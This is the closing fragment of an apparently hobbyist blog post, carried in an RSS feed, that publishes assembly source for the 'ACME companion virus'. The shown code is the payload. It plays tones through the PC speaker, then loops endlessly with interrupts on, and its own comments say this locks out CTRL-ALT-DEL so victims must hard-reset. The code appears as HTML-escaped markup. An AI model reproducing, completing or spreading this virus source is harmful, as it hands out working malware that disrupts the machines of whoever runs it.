&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; out&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 61h,al&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;now we turn on speaker&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; lodsw&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;load the repeat loop count into (ax)&lt;br /&gt;
LOOP6:&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,8000&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;delay count&lt;br /&gt;
LOOP7:&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; loop&amp;nbsp;&amp;nbsp;&amp;nbsp; LOOP7&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;do the delay&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; dec&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;decrement repeat count&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; jnz&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; LOOP6&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;if not = 0 loop back&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; in&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; al,61h&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;all done&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; and&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; al,11111100xb&amp;nbsp;&amp;nbsp; ;number turns speaker off&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; out&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 61h,al&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;send it&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; short TOON2&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;now go do next note&lt;br /&gt;
GO_MUZIK2:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;our loop point&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; sti&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;enable interrupts&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; TOON&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;jump back to beginning - this code&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; has the additional advantage of&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;locking out CTRL-ALT-DEL reboot.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ;The user must do a hard reset to recover from ACME.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
END_OF_CODE&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; =&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; $&lt;br /&gt;
&lt;br /&gt;
STACK_HERE&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; EQU&amp;nbsp;&amp;nbsp; END_OF_CODE + 512</description><link>http://programmelk.blogspot.com/2012/03/acme-companion-virus.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwn6oHoRyfjzt5beCuIzm8YjzO1QiStOP0BVWZQsTZ2CJ1n6PwEHGujwQve6y9dTnWMw4P_sN76znI9HQCgwLXKzvEvV2ROr1RgPpIL0F32if2kIn1_DRHuFbPkjxp8LrdXLUmHH8eI68/s72-c/image+virus+copy.jpg" width="72"/><thr:total>0</thr:total></item></channel></rss>